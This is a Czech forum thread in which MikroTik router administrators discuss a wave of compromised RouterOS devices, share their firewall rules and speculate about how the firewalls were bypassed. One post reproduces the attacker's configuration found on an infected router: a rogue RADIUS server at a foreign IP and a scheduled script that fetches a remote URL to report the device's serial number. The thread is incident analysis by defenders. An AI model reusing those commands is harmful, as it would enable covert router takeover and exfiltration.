MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

gmork

Napisu na support. FTP a telnet nepouzivame = vypnute. SSH pouzivame pouze pres VPN ci na LAN. Na FW z Venku krome VPN (IPSec a OpenVPN) neni nic povoleno ...

Zaregistroval jsem se na toto forum, protoze za ty leta co MK pouzivame je z meho pohledu dost fatlani chyba a v posledni dobe bohuzel nebyla jedinna. tak me zajimalo, zda nekdo nemel podobny problem jako ja, protoze pokud to UPLNE obeslo / ignorovalo FW a je tam nejaka dira napr v kernelu, ktera umoznuje prevzeti API. Tak to je sila a dela z MK vylozene nebezpecnou vec .... Kdyz vezmu v potaz, ze uvnitr je VSE nesifrovane.

ludvik

Pouvažoval jsi nad tím, že to mohlo přijít právě z "bezpečného přístavu"? Nebo i nebezpečného přes MAC-telnet/winbox?

A též jsi pouvažoval nad tím, že nám ukážeš konfiguraci?

dalibortoman

To je sice hezke co pisete, ale proste ty dva porty api z venku dostupne nejsou a nebyly, presto se neco / nekdo dostal z te ip 45.47.X.X zalogoval na API a pustil tam ten dany skript. Tak to je a bylo v logu. Je to proste stejne holy fakt jako tu pisete Vy jak funguje FW.

A me jedinne co zajima, je to, zda se to nekomu dostalo pres FW jako me. A zda, kdyz to obeslo FW, tak zda VYPNUTI toho API ochrani ten ubohy mikrotik, ktery je momentalne deravy vic nez dost.

Tot vse.

ukaz CFG toho firewallu ...

gmork

Takto to bylo pred napadenim.

/ip firewall filter

add action=add-src-to-address-list address-list=Syn_Flooder \

address-list-timeout=30m chain=input comment=\

"Add Syn Flood IP to the list" connection-limit=30,32 protocol=tcp \

tcp-flags=syn

add action=drop chain=input comment="Drop to syn flood list" \

src-address-list=Syn_Flooder

add action=add-src-to-address-list address-list=Port_Scanner \

address-list-timeout=1w chain=input comment="Port Scanner Detect" \

protocol=tcp psd=21,3s,3,1

add action=drop chain=input comment="Drop to port scan list" \

src-address-list=Port_Scanner

add action=add-src-to-address-list address-list=blocked address-list-timeout=\

1h chain=input comment=DDoS connection-limit=100,32 protocol=tcp

add action=tarpit chain=input connection-limit=3,32 protocol=tcp \

src-address-list=blocked

add action=jump chain=input comment="Jump for icmp input flow" jump-target=\

ICMP protocol=icmp

add action=accept chain=ICMP comment="Echo request - Avoiding Ping Flood" \

icmp-options=8:0 limit=1,5 protocol=icmp

add action=accept chain=ICMP comment="Echo reply" icmp-options=0:0 protocol=\

icmp

add action=accept chain=ICMP comment="Time Exceeded" icmp-options=11:0 \

protocol=icmp

add action=accept chain=ICMP comment="Destination unreachable" icmp-options=\

3:0-1 protocol=icmp

add action=accept chain=ICMP comment=PMTUD icmp-options=3:4 protocol=icmp

add action=drop chain=ICMP comment="Drop to the other ICMPs" protocol=icmp

add action=jump chain=output comment="Jump for icmp output" jump-target=ICMP \

protocol=icmp

add action=accept chain=input comment="Povoleni INPUT established, related" \

connection-state=established,related

add action=accept chain=input comment="Allow IKEv2" in-interface=WAN \

protocol=ipsec-esp

add action=accept chain=input dst-port=500 in-interface=WAN protocol=udp

add action=accept chain=input dst-port=4500 in-interface=WAN protocol=udp

add action=accept chain=input comment="Allow OpenVPN" dst-port=1195 \

in-interface=WAN protocol=tcp

add action=drop chain=input comment="DROP Input LAN" in-interface=LAN \

src-address-list=!localnet

add action=drop chain=input comment="DROP input" in-interface=WAN

add action=jump chain=forward comment="SYN Flood protect" connection-state=\

new jump-target=SYN-Protect protocol=tcp tcp-flags=syn

add action=add-src-to-address-list address-list=spammers \

address-list-timeout=3h chain=forward comment=\

"Add Spammers to the list for 3 hours" connection-limit=30,32 dst-port=\

25,587 limit=30/1m,0 protocol=tcp

add action=drop chain=forward comment="Avoid spammers action" dst-port=25,587 \

protocol=tcp src-address-list=spammers

add action=accept chain=forward comment="Established, related FORWARD" \

connection-state=established,related

add action=accept chain=forward comment="Posta forward WAN" dst-port=\

25,587,465 out-interface=WAN protocol=tcp src-address=192.168.56.1

add action=drop chain=forward dst-port=25,587,465 out-interface=WAN protocol=\

tcp src-address=192.168.56.0/24

add action=accept chain=forward comment=Localnet src-address=192.168.1.0/24

add action=accept chain=forward src-address=192.168.56.0/24

add action=accept chain=forward comment=VPN src-address=172.16.16.0/24

add action=drop chain=forward comment=Invalid connection-state=invalid

add action=drop chain=forward comment="DROP Forward" connection-nat-state=\

!dstnat connection-state=new in-interface=WAN

add action=accept chain=SYN-Protect connection-state=new limit=400,5 \

protocol=tcp tcp-flags=syn

add action=drop chain=SYN-Protect connection-state=new protocol=tcp \

tcp-flags=syn

/ip service

set telnet address=192.168.56.0/24 disabled=yes

set ftp address=192.168.56.0/24 disabled=yes

set www address=192.168.56.0/24

set ssh address=192.168.56.0/24

Po napadeni a vycisteni jsem v /ip service zablokoval obe API a nastavil LAN rozsah na Winbox port ...

ludvik

neznáme obsah address-listů - např. localnet.

Proč si nepřiznáš, že máš díru v těch tunelech?

gmork

Diru v tunelech ? Myslis jako ,ze to udelal infikovany vpnkar ? Ze pres jeho stroj se pripojil nekdo na API ze singapurske verejne IP adresy ?

Nebo pres nekoho z localnetu ?

0 localnet 192.168.56.0/24 feb/11/2018 09:00:08

1 localnet 192.168.1.0/24 feb/11/2018 09:00:19

2 localnet 172.16.16.0/24 feb/11/2018 09:00:47

dalibortoman

Takto to bylo pred napadenim.

kdyz jsem vyhazel co senetyka inputu a eliminoval ty ddos-scanner address listy (ktere nic nepovoluji) tak mi zbylo:

/ip firewall filter

add action=accept chain=input comment="Povoleni INPUT established, related" \

connection-state=established,related

add action=accept chain=input comment="Allow IKEv2" in-interface=WAN \

protocol=ipsec-esp

add action=accept chain=input dst-port=500 in-interface=WAN protocol=udp

add action=accept chain=input dst-port=4500 in-interface=WAN protocol=udp

add action=accept chain=input comment="Allow OpenVPN" dst-port=1195 \

in-interface=WAN protocol=tcp

add action=drop chain=input comment="DROP Input LAN" in-interface=LAN \

src-address-list=!localnet

add action=drop chain=input comment="DROP input" in-interface=WAN

nevim sice co je LAN a WAN ale nejpodezrelejsi je mi ten radek s action=tarpit. Dela vubec to, co slibuje ze bude delat? Pokud tomu rozumim spravne, tak by mel sice potichu zahazovat packety ale udrzovat zaznam v connection tracking tabulce. A co kdyby je nezahodil? Co kdyz radek s established,related (ktery se uplatni driv) zpusobi, ze se ty packety nezahodi?

gmork

Trapit blokuje ty dane IP co jdou na seznam blocked. to je funkcni.

Trapit NENI pod established, related na INPUTu, naopak.

LAN = LAN interface z ip 192.168.56.252

WAN = WAN verejna IP od ISP

gmork

<--- ia0 -->Snímek obrazovky 2018-06-22 v 13.54.12.png<--- ia0 -->

hapi

To je sice hezke co pisete, ale proste ty dva porty api z venku dostupne nejsou a nebyly, presto se neco / nekdo dostal z te ip 45.47.X.X zalogoval na API a pustil tam ten dany skript. Tak to je a bylo v logu. Je to proste stejne holy fakt jako tu pisete Vy jak funguje FW.

A me jedinne co zajima, je to, zda se to nekomu dostalo pres FW jako me.

Pokud to máš takhle krásně popsané včetně logu a seš si jistý že firewall máš napsaný dobře, tak je velikách chyba jestli jsi jim to nereportoval? V tom případě to je jen tlachání kterým se nic nevyřeší... :( Chce to email na support@mikrotik.com aby se ti k tomu vyjádřili.

tak máme taky kontaminaci. Hlavní router i přes input drop na wan straně a je nakaženej. Přístup má pouze 6 ip adres. Je teda pravda že jsme takhle silnej drop zapnuly asi před týdnem když tam byla od někoho hláška aby jsme upgradovaly, což jsme udělaly na aktuálně největší což byla 6.42.4, zapnuli input drop a dneska tam vidíme přepsaný identity a ve files dva soubory.

basty

Heslo menils?

hapi

ne ale proč bych měl když firewall zakazuje přihlásit se od jinud což jsme dneska testovaly a prostě se na router dostane člověk jenom z povolených ip ve firewallu. Žádnej tarpit, žádný pouze tcp nebo icmp, prostě total drop všeho kromě 6 IP adres.

invia

Jestli ještě před tou hláškou nemohlo dojít k tomu napadení routeru, akorát malware začal fungovat až potom. Otázka je, nemůže náhodou ten malware povolit na input ještě další IP adresu aniž by se to zobrazilo ve winboxu?

hapi

to nikdo neví ale určitě ano. Jinde se nastavujou i jiný limity a ve firewallu nejsou vidět takže tam určitě nebude vše vidět.

hapi

A máme to tu zase... Kromě klasiky (změny DNS) to dělá i jiné skopičiny:

/system identity

set name=test

/ip pool

add name=pool1 ranges=10.1.1.2-10.1.1.250

/ppp profile

add change-tcp-mss=yes dns-server=8.8.8.8 local-address=10.1.1.1 name=test remote-address=pool1 use-encryption=yes

/radius

add address=47.75.230.175 secret=test service=ppp

add address=47.75.230.175 secret=test service=ppp

/system scheduler

add interval=30m name=a on-event=ip policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup

/system script

add name=ip owner=admin policy=reboot,read,write,policy,test,password,sniff,sensitive source=\

"{/tool fetch url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=XXXXXXXXXX&action=upload&sncode=YYYYYYYY&dynamic=static\")}"

Na přístup si to vytváří nového uživatele ("Admin" - opravdu s velkým A) v systému a radius. V tom skriptu je XXXXXXX nějaký kód zatím v každém RB unikátní, totéž YYYYYYYY, jehož součástí je i sériové číslo routerboardu. Na některých byla vytvořená i nějaká maškaráda v NAT. Výše uvedený výpis pochází z napadeného zařízení, které běží na ROS i firmware 6.42.3 a kterému bylo jméno i heslo pro přístup změněno před několika málo dny.

Už se to řeší i na fóru MikroTiku:

https://forum.mikrotik.com/viewtopic.php?t=135762

https://forum.mikrotik.com/viewtopic.php?f=2&t=135774

Setkal se s tím už někdo zdejší?

jo jo, právě sem na to PPP taky teď přišel že je nastavený. Teď mě trochu víc děsí ta věc, že kolem oběda se na problém přišlo, zkontroloval se firewall atd.. a hlavně sem se podíval do scheduleru a scriptů a dal bych nevím co že tam scripty nebyly a ted tam jsou a přitom firewall tam je na dropu :

MKv6.42.4

myghael

Tak u nás zatím problém řeší omezení winboxu a SSH na naše IP v /ip services, vše ostatní tamtéž zcela vypnuto. Firewall nijak speciální nemáme, povolit established, related, povolit vše z lokálu, povolit zvenčí jen to co je třeba a pak drop všeho, takže úplná klasika. Tam, kde to takto máme, se problém nevyskytl, a to ani se staršími verzemi. RB v defaultu strčené na veřejku se nakazí tak do 10 minut, ať už je tam 6.10 nebo 6.42.5, historické verze (3.30, 4.17, 5.25) tímto problémem zjevně netrpí.

dalibortoman

tak máme taky kontaminaci. Hlavní router i přes input drop na wan straně a je nakaženej. Přístup má pouze 6 ip adres. Je teda pravda že jsme takhle silnej drop zapnuly asi před týdnem když tam byla od někoho hláška aby jsme upgradovaly, což jsme udělaly na aktuálně největší což byla 6.42.4, zapnuli input drop a dneska tam vidíme přepsaný identity a ve files dva soubory.

IMHO jsou 2 moznosti:

1) pri tom prvnim nakazeni (mozna ten whitehacker nebyl jediny kdo se dostal do systemu), se do systemu dostal nejakej backdoor, kterej prezije upgrade (netinstall se predpokladam nekonal). Jestli ma ROS nejaky vychytavky, ktery umi spustit kod z jinych particii apod, bylo by to mozne (a blbe). Backdoor/malware si pak sam zavola domu (cili input firewall ho nezastavi)

2) fakt neco prostreli firewall. Zkousel jsem si jeden MT prepnout fo devel-mode a je videt, ze k firewalovani se pouzivaji iptables. Bohuzel jsem nemel k dispozici utilitu iptables k vypisu pravidel, takze jsem se nemohl podivat, co v nich realne je. Jestli se vytvareji nejake pred winboxem skryta pravidla, pripadne nejake pravidla lze prostrelit, pak je to taky dost spatne.

Na nasich MT jsem zatim prakticky zadny problem nezaznamenal. Infrastrukturni maji ale vsechny privatni IPcka aty co slouzi k pripojeni zakazniku, maji na wanu privatku a na LANu verejnou gateway IP zakaznika a krome firewallu v ROSu tyhle verejny IP blokuje pro cokoliv mimo nasi sit (mimo ICMP) linuxova gateway v ceste. Zakaznik ma zakazany posilat packety s privatnima adresama do nasi site (cili se na nase MT nedostane).

Jina vec je, kdyz si zakaznik jako WiFi router nasadi Mikrotik (zakaznici maji verejne IP). Ty byly vetsinou nakazene uz v breznu. A na upozorneni na problem reaguje (spravne) jen zlomek.

hapi

Tak u nás zatím problém řeší omezení winboxu a SSH na naše IP v /ip services, vše ostatní tamtéž zcela vypnuto. Firewall nijak speciální nemáme, povolit established, related, povolit vše z lokálu, povolit zvenčí jen to co je třeba a pak drop všeho, takže úplná klasika. Tam, kde to takto máme, se problém nevyskytl, a to ani se staršími verzemi. RB v defaultu strčené na veřejku se nakazí tak do 10 minut, ať už je tam 6.10 nebo 6.42.5, historické verze (3.30, 4.17, 5.25) tímto problémem zjevně netrpí.

takže ty říkáš že se nakazí i čistá 6.42.5? mikrotik na foru píše že to není možné.

myghael

Vzal jsem úplně nový RBM33G, rozbalil, nahrál ROS 6.42.5, upgradnul firmware a samozřejmě změnil login i heslo, jinak jsem to kromě nastavení veřejné IP adresy (+ default route a DNS) nechal v tom základním nastavení od MikroTiku, včetně toho základního firewall typu "všechno zevnitř povol, všechno zvenku zahoď". Připojil jsem to na internet tak, aby na to nemohlo nějaké zavirované RB u nás v síti a za 10 minut tam byl ten čínský skript. Přiznám se, že fórum mikrotiku jsem před tímto pokusem nečetl.

hapi

jaká je šance že máš nakaženej počítač a automaticky to tam nahraje?

« Předchozí stránka Další stránka »